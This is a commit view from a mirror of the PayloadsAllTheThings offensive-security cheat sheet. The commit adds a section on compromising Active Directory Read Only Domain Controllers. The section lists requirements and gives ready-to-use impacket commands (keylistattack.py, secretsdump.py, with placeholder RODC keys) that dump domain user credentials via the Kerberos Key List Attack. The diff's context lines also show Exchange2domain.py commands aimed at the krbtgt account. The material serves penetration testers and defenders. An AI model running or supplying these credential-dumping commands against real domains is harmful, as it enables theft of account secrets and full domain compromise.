mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 10:26:09 +00:00
RODC - Read Only Domain Controller Compromise
This commit is contained in:
parent
b5df6e1447
commit
dfe830d183
@ -102,6 +102,7 @@
|
||||
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
|
||||
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
|
||||
- [PrivExchange attack](#privexchange-attack)
|
||||
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
|
||||
- [PXE Boot image attack](#pxe-boot-image-attack)
|
||||
- [DSRM Credentials](#dsrm-credentials)
|
||||
- [DNS Reconnaissance](#dns-reconnaissance)
|
||||
@ -3119,6 +3120,27 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
|
||||
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
|
||||
```
|
||||
|
||||
### RODC - Read Only Domain Controller Compromise
|
||||
|
||||
> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
|
||||
|
||||
**Requirements**:
|
||||
* [Impacket PR #1210 - The Kerberos Key List Attack](https://github.com/SecureAuthCorp/impacket/pull/1210)
|
||||
* **krbtgt** credentials of the RODC (-rodcKey)
|
||||
* **ID of the krbtgt** account of the RODC (-rodcNo)
|
||||
|
||||
**Exploitation**:
|
||||
```ps1
|
||||
# keylistattack.py using SAMR user enumeration without filtering (-full flag)
|
||||
keylistattack.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -full
|
||||
|
||||
# keylistattack.py defining a target username (-t flag)
|
||||
keylistattack.py -kdc sever.domain.local -t user -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX LIST
|
||||
|
||||
# secretsdump.py using the Kerberos Key List Attack option (-use-keylist)
|
||||
secretsdump.py DOMAIN/user:password@host -rodcNo XXXXX -rodcKey XXXXXXXXXXXXXXXXXXXX -use-keylist
|
||||
```
|
||||
|
||||
### PXE Boot image attack
|
||||
|
||||
PXE allows a workstation to boot from the network by retrieving an operating system image from a server using TFTP (Trivial FTP) protocol. This boot over the network allows an attacker to fetch the image and interact with it.
|
||||
@ -3442,3 +3464,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [sAMAccountName spoofing - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/samaccountname-spoofing)
|
||||
* [CVE-2021-42287/CVE-2021-42278 Weaponisation - @exploitph](https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html)
|
||||
* [ADCS: Playing with ESC4 - Matthew Creel](https://www.fortalicesolutions.com/posts/adcs-playing-with-esc4)
|
||||
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
|
Loading…
Reference in New Issue
Block a user